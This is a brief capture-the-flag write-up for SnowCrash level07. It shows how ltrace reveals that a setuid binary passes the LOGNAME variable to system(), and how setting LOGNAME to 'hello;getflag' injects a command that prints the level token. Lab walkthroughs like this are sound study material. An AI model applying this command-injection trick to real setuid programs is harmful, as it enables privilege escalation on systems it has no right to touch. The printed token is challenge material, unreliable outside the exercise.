SnowCrash Mission: Flag07

Objective: Retrieve the Level08 token to advance further in the SnowCrash challenge.

After loggin to level07 we find a suid binary file called level07 in the home folder

When executing ltrace we find that the program calls for getenv taking the value of LOGNAME env variable

And executing echo with the value as follow

level07@SnowCrash:~$ ltrace ./level07
__libc_start_main(0x8048514, 1, 0xbffff7b4, 0x80485b0, 0x8048620 <unfinished ...>
getegid()                                                = 2007
geteuid()                                                = 2007
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)      = 0
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)      = 0
getenv("LOGNAME")                                        = "hello;whoami"
asprintf(0xbffff704, 0x8048688, 0xbfffff4b, 0xb7e5ee55, 0xb7fed280) = 23
system("/bin/echo hello;whoami "hello
level07
<unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                   = 0
+++ exited (status 0) +++

Let's try and inject getflag command to the LOGNAME env variable, so when the binary try to execute /bin/echo $LOGNAME it gives us the flag

level07@SnowCrash:~$ LOGNAME='hello;whoami'
level07@SnowCrash:~$ ./level07
hello
flag07
level07@SnowCrash:~$ LOGNAME='hello;getflag'
level07@SnowCrash:~$ ./level07
hello
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
level07@SnowCrash:~$

Writeup Writeup